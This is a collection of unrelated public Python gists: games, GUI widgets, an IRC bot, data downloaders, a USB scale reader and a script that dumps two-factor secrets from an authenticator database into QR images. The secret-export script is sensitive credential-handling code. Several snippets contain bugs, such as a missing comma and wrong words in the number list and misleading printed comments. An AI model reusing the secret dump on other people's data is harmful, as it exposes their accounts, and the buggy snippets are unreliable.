my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, 0, ship_image, ship_info,
ship_thrust_sound)
a_rock = Sprite([0, 0], [0, 0], 0, 0, asteroid_image, asteroid_info)
rock_spawner() # force a initial spawn
missiles = list()
# register handlers
frame.set_draw_handler(draw)
frame.set_keydown_handler(key_down)
frame.set_keyup_handler(key_up)
timer = simplegui.create_timer(1000.0, rock_spawner)
# get things rolling
timer.start()
frame.start()
```
#### File: hard-gists/5702d57eb4cb6ef6e7e8/snippet.py
```python
import argparse
import os
import qrcode
import qrcode.image.pil
import sqlite3
import sys
import urllib
class AuthenticatorAccount(object):
def __init__(self, account_name, account_desc, secret):
self.account_name = account_name
self.account_desc = account_desc
self.secret = secret
def __repr__(self):
return "AuthenticatorAccount@%s%s" % (hex(id(self))[2:], self.__dict__)
def __main__():
parser = argparse.ArgumentParser()
parser.add_argument("database", help="The SQLite database file.")
args = parser.parse_args()
if not os.path.isfile(args.database):
sys.stderr.write("Unable to open %s.\n" % (args.database,))
sys.stderr.flush()
sys.exit(1)
conn = sqlite3.connect(args.database)
conn.row_factory = sqlite3.Row
cursor = conn.cursor()
cursor.execute("SELECT * FROM accounts ORDER BY _id;")
row = None
while True:
row = cursor.fetchone()
if row is None:
break
account = AuthenticatorAccount(row['issuer'] or row['original_name'], row['email'],
row['secret'])
print """Saving "%s" to "qrcode-account-%02d.svg" """[:-1] % (account.account_desc,
row['_id'])
qr = qrcode.make("otpauth://totp/%s?secret=%s&issuer=%s" % (account.account_desc,
account.secret, account.account_name), image_factory=qrcode.image.pil.PilImage)
with open("qrcode-account-%02d.png" % (row['_id'],), "wb") as f:
qr.save(f)
if __name__ == "__main__":
__main__()
```
#### File: hard-gists/5703516/snippet.py
```python
from PySide import QtGui, QtCore
def findviewer():
stack = QtGui.QApplication.topLevelWidgets()
viewers = []
while stack:
widget = stack.pop()
if widget.windowTitle().startswith('Viewer'):
# TODO: More robust detection of viewer widget (verify some of the child widgets or something..?)
viewers.append(widget)
stack.extend(c for c in widget.children() if c.isWidgetType())
return viewers
class KeyIntercepter(QtCore.QObject):
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.Type.KeyPress:
if event.key() == QtCore.Qt.Key_C:
def sendkey(key):
new_event = QtGui.QKeyEvent(QtCore.QEvent.KeyPress, key, QtCore.Qt.NoModifier)
QtGui.QApplication.instance().postEvent(
obj,
new_event)
# Same as pressing "RGRR" in viewer, switches between to channels, then back to RGB
sendkey(QtCore.Qt.Key_R)
sendkey(QtCore.Qt.Key_G)
sendkey(QtCore.Qt.Key_R)
sendkey(QtCore.Qt.Key_R)
# Event was handled..
return True
return QtCore.QObject.eventFilter(obj, obj, event)
viewers = findviewer()
# Remove old event filter
# FIXME: Debugging thing, for iteration in script editor
try: dag.removeEventFilter(thing)
except: pass
# Install event filter
thing=KeyIntercepter()
for v in viewers:
v.installEventFilter(thing)
```
#### File: hard-gists/5748e199a3bec164a867c9b654e5ffe5/snippet.py
```python
import numpy as np
import gym
from gym.spaces import Discrete, Box
from gym.wrappers import Monitor
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
# ================================================================
# Policies
# ================================================================
class DeterministicDiscreteActionLinearPolicy(object):
def __init__(self, theta, model, ob_space, ac_space):
"""
dim_ob: dimension of observations
n_actions: number of actions
theta: flat vector of parameters
"""
dim_ob = ob_space.shape[0]
n_actions = ac_space.n
#assert len(theta) == (dim_ob + 1) * n_actions
#self.W = theta[0 : dim_ob * n_actions].reshape(dim_ob, n_actions)
#self.b = theta[dim_ob * n_actions : None].reshape(1, n_actions)
self.model = model
self.shapes = [w.shape for w in self.model.get_weights()]
self.sizes = [w.size for w in self.model.get_weights()]
self.model.set_weights(self._get_weights_list(theta))
self.model.compile(optimizer='sgd', loss='mse')
def _get_weights_list(self, weights_flat):
weights = []
pos = 0
for i_layer, size in enumerate(self.sizes):
arr = weights_flat[pos:pos+size].reshape(self.shapes[i_layer])
weights.append(arr)
pos += size
return weights
def act(self, ob):
"""
"""
batch = np.array([[ob]])
actions = self.model.predict_on_batch(batch).flatten()
return np.argmax(actions)
class DeterministicContinuousActionLinearPolicy(object):
def __init__(self, theta, ob_space, ac_space):
"""
dim_ob: dimension of observations
dim_ac: dimension of action vector
theta: flat vector of parameters
"""
self.ac_space = ac_space
dim_ob = ob_space.shape[0]
dim_ac = ac_space.shape[0]
assert len(theta) == (dim_ob + 1) * dim_ac
self.W = theta[0 : dim_ob * dim_ac].reshape(dim_ob, dim_ac)
self.b = theta[dim_ob * dim_ac : None]
def act(self, ob):
a = np.clip(ob.dot(self.W) + self.b, self.ac_space.low, self.ac_space.high)
return a
def do_episode(policy, env, num_steps, discount=1.0, render=False):
disc_total_rew = 0
ob = env.reset()
for t in xrange(num_steps):
a = policy.act(ob)
(ob, reward, done, _info) = env.step(a)
disc_total_rew += reward * discount**t
if render and t%3==0:
env.render()
if done: break
return disc_total_rew
env = None
def noisy_evaluation(theta, discount=0.90):
policy = make_policy(theta)
reward = do_episode(policy, env, num_steps, discount)
return reward
def make_policy(theta):
if isinstance(env.action_space, Discrete):
return DeterministicDiscreteActionLinearPolicy(theta,
model, env.observation_space, env.action_space)
elif isinstance(env.action_space, Box):
return DeterministicContinuousActionLinearPolicy(theta,
env.observation_space, env.action_space)
else:
raise NotImplementedError
# Task settings:
env = gym.make('CartPole-v1') # Change as needed
#env = Monitor(env, '/tmp/cartpole-experiment-1', force=True)
# Alg settings:
num_steps = 500 # maximum length of episode
n_iter = 50 # number of iterations of ES
batch_size = 25 # number of samples per batch
#extra_std = 2.0
#extra_decay_time = 10
# Model
# model = Sequential()
# model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
# model.add(Dense(env.action_space.n))
# model.add(Activation('softmax'))
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(env.action_space.n))
model.add(Activation('softmax'))
sizes = [w.size for w in model.get_weights()]
if isinstance(env.action_space, Discrete):
dim_theta = sum(sizes)
elif isinstance(env.action_space, Box):
dim_theta = (env.observation_space.shape[0]+1) * env.action_space.shape[0]
else:
raise NotImplementedError
# Initialize mean and standard deviation
epsilon_mean = np.zeros(dim_theta)
sigma = 2
epsilon_std = sigma * np.ones(dim_theta)
theta = np.random.uniform(-1, 1, size=dim_theta)
alpha = 0.001
# Now, for the algorithm
for itr in xrange(n_iter):
# Sample parameter vectors and evaluate rewards
#extra_cov = max(1.0 - itr / extra_decay_time, 0) * extra_std**2
epsilons = np.random.multivariate_normal(mean=epsilon_mean,
cov=np.diag(np.array(epsilon_std**2)),
size=batch_size)
rewards = np.array(map(noisy_evaluation, theta + sigma * epsilons))
# standardize the rewards
rewards = (rewards - rewards.mean()) / rewards.std()
# gradient ascent with score function estimator
theta += alpha * rewards.dot(epsilons) / (batch_size * sigma)
print "iteration %i. mean f: %8.3g. max f: %8.3g"%(itr, np.mean(rewards), np.max(rewards))
do_episode(make_policy(theta), env, num_steps, discount=0.90, render=True)
env.close()
```
#### File: hard-gists/574fc95caee4c22f21ed/snippet.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
db = SQLAlchemy(app)
class Author(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
books = db.relationship('Book', backref='author')
def __repr__(self):
return '<Author:{}>'.format(self.name)
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.Text)
content = db.Column(db.Text)
author_id = db.Column(db.Integer, db.ForeignKey('author.id'))
def __repr__(self):
return '<Book:{}>'.format(self.title)
categories = db.Table('categories',
db.Column('category_id', db.Integer, db.ForeignKey('category.id')),
db.Column('book_id', db.Integer, db.ForeignKey('book.id'))
)
class Category(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
books = db.relationship('Book', secondary=categories,
backref=db.backref('categories', lazy='dynamic'))
def __repr__(self):
return '<Category:{}>'.format(self.name)
with app.app_context():
db.create_all()
bob = Author(name='Bob')
dune = Book(title='Dune')
moby_dick = Book(title='Moby Dick')
carol = Author(name='Carol')
ring_world = Book(title='Ring World')
fahrenheit = Book(title='Fahrenheit 451')
bob.books = [dune, moby_dick]
carol.books = [ring_world, fahrenheit]
db.session.add(bob)
db.session.add(carol)
db.session.commit()
author = Author.query.filter_by(name='Bob').first()
print author # <Author:Carol>
print author.books # [<Book:Ring World>, <Book:Fahrenheit 451>]
dune_book = Book.query.filter_by(title='Dune').first()
print dune_book # <Book:Dune>
print dune_book.author # <Author:Bob>
scifi = Category(name='Science Fiction')
classic = Category(name='Classic')
classic.books = [moby_dick, dune, fahrenheit]
scifi.books = [dune, ring_world]
db.session.add_all([classic, scifi])
db.session.commit()
print dune, dune.categories.all()
print dune.categories.filter(Category.name.ilike('sci%')).all()
alice = Author(name='Alice')
beowulf = Book(title='Beowulf')
beowulf.author = alice
beowulf.categories = [classic]
db.session.add(beowulf)
db.session.commit()
print Author.query.join(Author.books).filter(
Book.categories.contains(scifi)).all()
print Category.query.join(Category.books).filter(
Book.author==carol).all()
```
#### File: hard-gists/5780124/snippet.py
```python
import flac.encoder as encoder
import pyaudio
import sys
import requests
import random
from threading import Thread
from Queue import Queue, Empty
from time import sleep
class google_stt_stream(object):
def __init__(self):
self.write_queue = Queue()
self.keep_streaming = True
self.upstream_url = "https://www.google.com/speech-api/full-duplex/v1/up?key=%(key)s&pair=%(pair)s&lang=en-US&maxAlternatives=20&client=chromium&continuous&interim"
self.upstream_headers = {'content-type': 'audio/x-flac; rate=16000'}
self.downstream_url = "https://www.google.com/speech-api/full-duplex/v1/down?pair=%(pair)s"
self.api_key = "<your_api_key>"
def generate_request_key(self):
return hex(random.getrandbits(64))[2:-1]
def start(self):
pair = self.generate_request_key()
upstream_url = self.upstream_url % {"pair": pair, "key": self.api_key}
downstream_url = self.downstream_url % {"pair": pair, "key": self.api_key}
self.session = requests.Session()
self.upstream_thread = Thread(target=self.upstream, args=(upstream_url,))
self.downstream_thread = Thread(target=self.downstream, args=(downstream_url,))
self.downstream_thread.start()
self.upstream_thread.start()
def stop(self):
print "Waiting write_queue to write all data"
self.write_queue.join()
print "Queue empty"
sleep(10)
self.keep_streaming=False
self.upstream_thread.join()
self.downstream_thread.join()
def write_data(self, data):
self.write_queue.put(data)
def gen_data(self):
while self.keep_streaming:
try:
item = self.write_queue.get(timeout=2)
except Empty:
return
yield item
self.write_queue.task_done()
def upstream(self, url):
print self.session.post(url, headers=self.upstream_headers, data=self.gen_data())
def downstream(self, url):
r = self.session.get(url, stream=True)
while self.keep_streaming:
try:
for line in r.iter_content():
if not self.keep_streaming:
break
if line:
sys.stdout.write(line)
except Exception as e:
print "Exception %s, restarting" %e
self.keep_streaming = False
self.upstream_thread.join()
self.keep_streaming = True
self.start()
return
print "end"
stt = google_stt_stream()
def write(enc, buf, samples, current_frame):
stt.write_data(buf)
#print current_frame, samples
return True
#config
chunk = 512
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
THRESHOLD = 180 #The threshold intensity that defines silence signal (lower than).
#open stream
p = pyaudio.PyAudio()
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
frames_per_buffer = chunk)
# setup the encoder ...
enc = encoder.StreamEncoder()
enc.set_channels(1)
#enc.set_bits_per_sample(wav.getsampwidth()*8)
enc.set_sample_rate(16000)
#enc.set_compression_level(0)
# initialize
if enc.init_stream(write) != encoder.FLAC__STREAM_ENCODER_OK:
print "Error"
sys.exit()
# start encoding !
stt.start()
nsamples = 512
while 1:
data = stream.read(nsamples)
if not data:
enc.finish()
break
enc.process(data, nsamples)
#sleep(.001)
stt.stop()
```
#### File: hard-gists/5793291/snippet.py
```python
from PyQt4 import QtCore, QtGui
class ColorBox(QtGui.QFrame):
def __init__(self,parent=None):
super(ColorBox,self).__init__(parent)
self.bgColor = QtCore.Qt.white
self.setFixedHeight(20)
self.setFrameStyle(1)
self.setStyleSheet("QWidget { border-color: rgba(0,0,0,0)}")
def mousePressEvent(self, e):
if e.buttons() == QtCore.Qt.LeftButton:
col = QtGui.QColorDialog.getColor(self.bgColor, self)
if col.isValid():
rgb = (col.red(), col.green(), col.blue())
self.setStyleSheet("QWidget { background-color: rgb(%d,%d,%d) }" % rgb)
self.bgColor = col
if __name__ == "__main__":
app = QtGui.QApplication([])
c = ColorBox()
c.show()
app.exec_()
```
#### File: hard-gists/5794494/snippet.py
```python
from gi.repository import Gtk, Gdk
import sys
class MyWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="Hello World")
self.set_name('MyWindow')
self.set_default_size(600, 300)
self.box = Gtk.HBox()
self.box.set_halign(Gtk.Align.CENTER)
self.box.set_valign(Gtk.Align.CENTER)
self.add(self.box)
self.button1 = Gtk.Button(label="Hello")
self.button1.connect("clicked", self.on_button1_clicked)
self.box.pack_start(self.button1, True, True, 0)
self.button2 = Gtk.Button(label="Goodbye")
self.button2.connect("clicked", self.on_button2_clicked)
self.box.pack_start(self.button2, True, True, 0)
def on_button1_clicked(self, widget):
print("Hello")
def on_button2_clicked(self, widget):
print("Goodbye")
def main(argv):
def gtk_style():
css = b"""
* {
transition-property: color, background-color, border-color, background-image, padding, border-width;
transition-duration: 1s;
font: Cantarell 20px;
}
GtkWindow {
background: linear-gradient(153deg, #151515, #151515 5px, transparent 5px) 0 0,
linear-gradient(333deg, #151515, #151515 5px, transparent 5px) 10px 5px,
linear-gradient(153deg, #222, #222 5px, transparent 5px) 0 5px,
linear-gradient(333deg, #222, #222 5px, transparent 5px) 10px 10px,
linear-gradient(90deg, #1b1b1b, #1b1b1b 10px, transparent 10px),
linear-gradient(#1d1d1d, #1d1d1d 25%, #1a1a1a 25%, #1a1a1a 50%, transparent 50%, transparent 75%, #242424 75%, #242424);
background-color: #131313;
background-size: 20px 20px;
}
.button {
color: black;
background-color: #bbb;
border-style: solid;
border-width: 2px 0 2px 2px;
border-color: #333;
padding: 12px 4px;
}
.button:first-child {
border-radius: 5px 0 0 5px;
}
.button:last-child {
border-radius: 0 5px 5px 0;
border-width: 2px;
}
.button:hover {
padding: 12px 48px;
background-color: #4870bc;
}
.button *:hover {
color: white;
}
.button:hover:active,
.button:active {
background-color: #993401;
}
"""
style_provider = Gtk.CssProvider()
style_provider.load_from_data(css)
Gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(),
style_provider,
Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
gtk_style()
win = MyWindow()
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
if __name__ == "__main__":
main(sys.argv)
```
#### File: hard-gists/5823693/snippet.py
```python
import sys
from twisted.internet import defer, endpoints, protocol, reactor, task
from twisted.python import log
from twisted.words.protocols import irc
class MyFirstIRCProtocol(irc.IRCClient):
nickname = 'MyFirstIrcBot'
def __init__(self):
self.deferred = defer.Deferred()
def connectionLost(self, reason):
self.deferred.errback(reason)
def signedOn(self):
# This is called once the server has acknowledged that we sent
# both NICK and USER.
for channel in self.factory.channels:
self.join(channel)
# Obviously, called when a PRIVMSG is received.
def privmsg(self, user, channel, message):
nick, _, host = user.partition('!')
message = message.strip()
if not message.startswith('!'): # not a trigger command
return # so do nothing
command, sep, rest = message.lstrip('!').partition(' ')
# Get the function corresponding to the command given.
func = getattr(self, 'command_' + command, None)
# Or, if there was no function, ignore the message.
if func is None:
return
# maybeDeferred will always return a Deferred. It calls func(rest), and
# if that returned a Deferred, return that. Otherwise, return the
# return value of the function wrapped in
# twisted.internet.defer.succeed. If an exception was raised, wrap the
# traceback in twisted.internet.defer.fail and return that.
d = defer.maybeDeferred(func, rest)
# Add callbacks to deal with whatever the command results are.
# If the command gives error, the _show_error callback will turn the
# error into a terse message first:
d.addErrback(self._showError)
# Whatever is returned is sent back as a reply:
if channel == self.nickname:
# When channel == self.nickname, the message was sent to the bot
# directly and not to a channel. So we will answer directly too:
d.addCallback(self._sendMessage, nick)
else:
# Otherwise, send the answer to the channel, and use the nick
# as addressing in the message itself:
d.addCallback(self._sendMessage, channel, nick)
def _sendMessage(self, msg, target, nick=None):
if nick:
msg = '%s, %s' % (nick, msg)
self.msg(target, msg)
def _showError(self, failure):
return failure.getErrorMessage()
def command_ping(self, rest):
return 'Pong.'
def command_saylater(self, rest):
when, sep, msg = rest.partition(' ')
when = int(when)
d = defer.Deferred()
# A small example of how to defer the reply from a command. callLater
# will callback the Deferred with the reply after so many seconds.
reactor.callLater(when, d.callback, msg)
# Returning the Deferred here means that it'll be returned from
# maybeDeferred in privmsg.
return d
class MyFirstIRCFactory(protocol.ReconnectingClientFactory):
protocol = MyFirstIRCProtocol
channels = ['##MyFirstIrcBot']
def main(reactor, description):
endpoint = endpoints.clientFromString(reactor, description)
factory = MyFirstIRCFactory()
d = endpoint.connect(factory)
d.addCallback(lambda protocol: protocol.deferred)
return d
if __name__ == '__main__':
log.startLogging(sys.stderr)
task.react(main, ['tcp:irc.freenode.net:6667'])
```
#### File: hard-gists/5849024/snippet.py
```python
import re, fileinput
import pyPEG
from pyPEG import parse, parseLine
from pyPEG import keyword, _and, _not, ignore
import datetime
## Taken from https://gist.github.com/bertspaan/3059017 and translated to English. It is Working well BUT if you find any errors, please comment!
numbers = [
"zero",
"one",
"two",
"three",
"four",
"five",
"six",
"seven",
"eight",
"nine",
"ten",
"eleven",
"twelve",
"thirteen",
"fourteen",
"fifteen",
"sixteen",
"seventeen",
"eighteen",
"nineteen"
"twenty",
"twenty one",
"twenty two",
"twenty three",
"twenty four",
"twenty five",
"twenty six",
"twenty seven",
"twenty eight",
"twenty nine",
"thirty",
"thirty one",
"thirty two",
"thirty three",
"four thirty",
"thirty five",
"thirty six",
"thirty seven",
"thirty eight",
"thirty nine",
"forty",
"forty one",
"forty two",
"forty three",
"forty four",
"forty five",
"forty six",
"forty seven",
"forty eight",
"forty nine",
"fifty",
"fifty one",
"fifty two",
"three fifty",
"four fifty",
"fifty five",
"fifty six",
"fifty seven",
"fifty eight",
"fifty nine",
"sixty"
]
times = [
"thirteen past 5",
"12 56",
"12:56",
"twelve thirty",
"nine fifteen",
"quarter to two",
"ten to two",
"three to half ten",
"13 hour 52",
"three thirty",
"seven thirty",
"eighteen fifteen",
"seven",
"nine",
"8 hour",
"eighteen fifteen",
]
def number(): return re.compile(r"\w+")
def half(): return re.compile(r"half")
def hours(): return -1, half, number, -1, keyword("hours")
def sign(): return [re.compile(r"to"), re.compile(r"past")]
def minutes(): return number
def time(): return [
(minutes, sign, hours),
(minutes, sign, hours),
(hours, -1, ":", minutes),
hours
]
def string_to_int(str):
if str == "quarter":
return 15
for i in range(0, 60):
if str == numbers[i]:
return i
return int(str)
def to_time(ast):
minutes_str = ""
hours_str = ""
half = False
sign = 1
# ast is tuple (ast, ''). skip weird '' part:
ast = ast[0]
for symbol in ast:
name = symbol[0]
value = symbol[1]
if name == "hours":
if len(value) == 2:
# Has 'half'
half = True
hours_str = value[1][1]
else:
hours_str = value[0][1]
elif name == "minutes":
minutes_str = value[0][1]
elif name == "sign":
if value[0] == "voor":
sign = -1
minutes = 0
if len(hours_str) > 0:
minutes = string_to_int(hours_str) * 60
if half:
minutes -= 30
if len(minutes_str) > 0:
minutes += sign * string_to_int(minutes_str)
hours = minutes // 60
minutes = minutes - (60 * hours)
today = datetime.date.today() + datetime.timedelta(days=1)
return datetime.datetime.combine(today, datetime.time(hours, minutes))
for time_str in times:
ast = parseLine(textline=time_str, pattern=time(), resultSoFar=[])
print time_str, " => ", to_time(ast)
```
#### File: hard-gists/5856269/snippet.py
```python
import blpapi
import datetime
class BbDownloader:
def __init__(self):
self.output_file = ""
self.TICK_DATA = blpapi.Name("tickData")
self.COND_CODE = blpapi.Name("conditionCodes")
self.TICK_SIZE = blpapi.Name("size")
self.TIME = blpapi.Name("time")
self.TYPE = blpapi.Name("type")
self.VALUE = blpapi.Name("value")
self.RESPONSE_ERROR = blpapi.Name("responseError")
self.CATEGORY = blpapi.Name("category")
self.MESSAGE = blpapi.Name("message")
self.SESSION_TERMINATED = blpapi.Name("SessionTerminated")
def write_tick_data(self, output_filename, security, start_date, end_date):
self.output_file = open(output_filename, "w")
# Fill SessionOptions
sessionOptions = blpapi.SessionOptions()
sessionOptions.setServerHost("localhost")
sessionOptions.setServerPort(8194)
session = blpapi.Session(sessionOptions)
# Start a Session
if not session.start():
print "Failed to start session."
return
try:
# Open service to get historical data from
if not session.openService("//blp/refdata"):
print "Failed to open //blp/refdata"
return
self.sendIntradayTickRequest(session, security, start_date, end_date)
# wait for events from session.
self.eventLoop(session)
finally:
self.output_file.flush()
session.stop()
print "Finished"
def sendIntradayTickRequest(self, session, security, start_date, end_date):
refDataService = session.getService("//blp/refdata")
request = refDataService.createRequest("IntradayTickRequest")
# only one security/eventType per request
request.set("security", security)
# Add fields to request
eventTypes = request.getElement("eventTypes")
for event in ["ASK", "BID", "TRADE"]:
eventTypes.appendValue(event)
# All times are in GMT
request.set("startDateTime", start_date)
request.set("endDateTime", end_date)
request.set("includeConditionCodes", True)
print "Sending Request:", request
session.sendRequest(request)
def eventLoop(self, session):
done = False
while not done:
# nextEvent() method below is called with a timeout to let
# the program catch Ctrl-C between arrivals of new events
event = session.nextEvent(500)
if event.eventType() == blpapi.Event.PARTIAL_RESPONSE:
self.processResponseEvent(event)
elif event.eventType() == blpapi.Event.RESPONSE:
self.processResponseEvent(event)
done = True
else:
for msg in event:
if event.eventType() == blpapi.Event.SESSION_STATUS:
if msg.messageType() == self.SESSION_TERMINATED:
done = True
def processResponseEvent(self, event):
for msg in event:
if msg.hasElement(self.RESPONSE_ERROR):
print msg.getElement(self.RESPONSE_ERROR)
continue
self.processMessage(msg)
def processMessage(self, msg):
data = msg.getElement(self.TICK_DATA).getElement(self.TICK_DATA)
for item in data.values():
time = item.getElementAsDatetime(self.TIME)
timeString = item.getElementAsString(self.TIME)
type = item.getElementAsString(self.TYPE)
value = item.getElementAsFloat(self.VALUE)
size = item.getElementAsInteger(self.TICK_SIZE)
if item.hasElement(self.COND_CODE):
cc = item.getElementAsString(self.COND_CODE)
else:
cc = ""
line = format("%s\t%s\t%.3f\t\t%d\t%s\n" % (timeString, type, value, size, cc))
self.output_file.write(line)
bbdl = BbDownloader()
bbdl.write_tick_data(output_filename="spx.txt",
security="SPX INDEX",
start_date="2013-06-24T00:00:00",
end_date="2013-06-24T23:00:00")
```
#### File: hard-gists/5860853/snippet.py
```python
import sys, traceback, scipy, numpy
from matplotlib import pyplot
from scipy.stats.mstats import mquantiles
def HistogramImage(data):
print 'entered HistogramImage'
#http://www.saltycrane.com/blog/2011/12/creating-histogram-plot-python/
x = [int(dbyte[0]) for dbyte in data]
binsize = 100
totalrangeofhisto = 20000
bins = [i * binsize for i in range(totalrangeofhisto/binsize)]
pyplot.hist(x, bins=bins, facecolor='green', alpha=0.75)
pyplot.xlabel('dbytes')
pyplot.ylabel('Count')
pyplot.suptitle(r'histogram of dbytes')
pyplot.title(r'distribution for matt->smarsh')
pyplot.grid(True)
filename='histo.png'
try:
pyplot.savefig(filename)
print 'saved to %s' %filename
except:
print 'unable to save to %s' %filename
def FindQuantile(data,findme):
print 'entered FindQuantile'
probset=[]
#cheap hack to make a quick list to get quantiles for each permille value]
for i in numpy.linspace(0,1,10000):
probset.append(i)
#http://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.mstats.mquantiles.html
quantile_results = mquantiles(data,prob=probset)
#see: http://stackoverflow.com/q/17330252/
quantiles = []
i = 0
for value in quantile_results:
print str(i) + ' permille ' + str(value)
quantiles.append(value)
i = i+1
#goal is to figure out which quantile findme falls in:
i = 0
for quantile in quantiles:
if (findme > quantile):
print str(quantile) + ' is too small for ' + str(findme)
else:
print str(quantile) + ' is the quantile value for the ' + str(i) + '-' + str(i + 1) + ' per mille quantile range. ' + str(findme) + ' falls within this range.'
break
i = i + 1
if __name__ == "__main__":
import MySQLdb
#http://www.tutorialspoint.com/python/python_database_access.htm
#http://www.packtpub.com/article/exception-handling-mysql-python
db = MySQLdb.connect("localhost","argus","db_password","argus" )
cursor = db.cursor()
sql = "SELECT dbytes FROM argus.argusTable_2013_06_24 where (saddr = '192.168.100.23' or daddr = '192.168.100.23') and daddr = '172.16.31.10' and proto = 'tcp' and dport = '443';"
try:
cursor.execute(sql)
results = cursor.fetchall()
lresults = list(results)
except MySQLdb.Error, e:
print "Error: %s" %e
exit()
db.close()
dbytes = []
for row in results:
dbytes.append(int(row[0]))
for dbyte in sorted(dbytes):
print dbyte
try:
dothis = raw_input("What would you like to do? h = histogram, q = quantile ")
if (len(dothis) == 0):
exit()
elif (dothis == 'h'):
print 'calling HistogramImage'
HistogramImage(results)
elif (dothis == 'q'):
andthis = raw_input('What X would you like to find the quantile for? ')
print 'finding Quantile for %s' %andthis
FindQuantile(sorted(lresults), float(andthis))
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
print "*** format_exc, first and last line:"
formatted_lines = traceback.format_exc().splitlines()
print formatted_lines[0]
print formatted_lines[-1]
print "*** format_exception:"
print repr(traceback.format_exception(exc_type, exc_value, exc_traceback))
print "*** extract_tb:"
print repr(traceback.extract_tb(exc_traceback))
print "*** format_tb:"
print repr(traceback.format_tb(exc_traceback))
print "*** tb_lineno:", exc_traceback.tb_lineno
print 'exiting'
exit()
```
#### File: hard-gists/5862530/snippet.py
```python
import os, time
import usb.core
import usb.util
import pygtk
pygtk.require('2.0')
import gtk
from sys import exit
import math
# DYMO M25
VENDOR_ID = 0x0922
PRODUCT_ID = 0x8004
# USPS 75lb scale (doesn't work yet...)
#VENDOR_ID = 0x04d9
#PRODUCT_ID = 0x8010
# find the USB device
dev = usb.core.find(idVendor=VENDOR_ID,
idProduct=PRODUCT_ID)
def main():
try:
# was it found?
if dev is None:
print "device not found"
exit()
else:
devmanufacturer = usb.util.get_string(dev, 256, 1)
devname = usb.util.get_string(dev, 256, 2)
print "device found: " + devmanufacturer + " " + devname
interface = 0
if dev.is_kernel_driver_active(interface) is True:
print "but we need to detach kernel driver"
dev.detach_kernel_driver(interface)
# use the first/default configuration
dev.set_configuration()
print "claiming device"
usb.util.claim_interface(dev, interface)
# XXX would be good to release it when we're done:
#
# print "release claimed interface"
# usb.util.release_interface(dev, interface)
# print "now attaching the kernel driver again"
# dev.attach_kernel_driver(interface)
# print "all done"
listen()
except KeyboardInterrupt as e:
print "\nquitting"
exit();
def grab():
try:
# first endpoint
endpoint = dev[0][(0,0)][0]
# read a data packet
attempts = 10
data = None
while data is None and attempts > 0:
try:
data = dev.read(endpoint.bEndpointAddress,
endpoint.wMaxPacketSize)
except usb.core.USBError as e:
data = None
if e.args == ('Operation timed out',):
attempts -= 1
print "timed out... trying again"
continue
return data
except usb.core.USBError as e:
print "USBError: " + str(e.args)
except IndexError as e:
print "IndexError: " + str(e.args)
def listen():
DATA_MODE_GRAMS = 2
DATA_MODE_OUNCES = 11
last_raw_weight = 0
last_raw_weight_stable = 4
print "listening for weight..."
while True:
time.sleep(.5)
weight = 0
print_weight = ""
data = grab()
if data != None:
raw_weight = data[4] + data[5] * 256
# +/- 2g
if raw_weight > 0 and abs(raw_weight-last_raw_weight) > 0 and raw_weight != last_raw_weight:
last_raw_weight_stable = 4
last_raw_weight = raw_weight
if raw_weight > 0 and last_raw_weight_stable >= 0:
last_raw_weight_stable -= 1
if raw_weight > 0 and last_raw_weight_stable == 0:
if data[2] == DATA_MODE_OUNCES:
ounces = raw_weight * 0.1
weight = math.ceil(ounces)
print_weight = "%s oz" % ounces
elif data[2] == DATA_MODE_GRAMS:
grams = raw_weight
weight = math.ceil(grams)
print_weight = "%s g" % grams
print "stable weight: " + print_weight
clipboard = gtk.clipboard_get()
clipboard.set_text(str(weight))
clipboard.store()
def probe():
for cfg in dev:
print "cfg: " + str(cfg.bConfigurationValue)
print "descriptor: " + str(usb.util.find_descriptor(cfg, find_all=True, bInterfaceNumber=1))
for intf in cfg:
print "interfacenumber, alternatesetting: " + str(intf.bInterfaceNumber) + ',' + str(intf.bAlternateSetting)
for ep in intf:
print "endpointaddress: " + str(ep.bEndpointAddress)
#probe()
main()
```
#### File: hard-gists/5881137/snippet.py
```python
import re
from rest_framework import serializers, renderers, parsers
class JSONRenderer(renderers.JSONRenderer):
def render(self, data, *args, **kwargs):
if data:
data = recursive_key_map(underscore_to_camelcase, data)
return super(JSONRenderer, self).render(data, *args, **kwargs)
class JSONParser(parsers.JSONParser):
def parse(self, *args, **kwargs):
obj = super(JSONParser, self).parse(*args, **kwargs)
return recursive_key_map(camelcase_to_underscore, obj)
def underscore_to_camelcase(word, lower_first=True):
result = ''.join(char.capitalize() for char in word.split('_'))
if lower_first:
return result[0].lower() + result[1:]
else:
return result
_first_cap_re = re.compile('(.)([A-Z][a-z]+)')
_all_cap_re = re.compile('([a-z0-9])([A-Z])')
# http://stackoverflow.com/a/1176023
def camelcase_to_underscore(word):
s1 = _first_cap_re.sub(r'\1_\2', word)
return _all_cap_re.sub(r'\1_\2', s1).lower()
def recursive_key_map(function, obj):
if isinstance(obj, dict):
new_dict = {}
for key, value in obj.iteritems():
if isinstance(key, basestring):
key = function(key)
new_dict[key] = recursive_key_map(function, value)
return new_dict
if hasattr(obj, '__iter__'):
return [recursive_key_map(function, value) for value in obj]
else:
return obj
```
#### File: hard-gists/5886984/snippet.py
```python
import pandas as pd
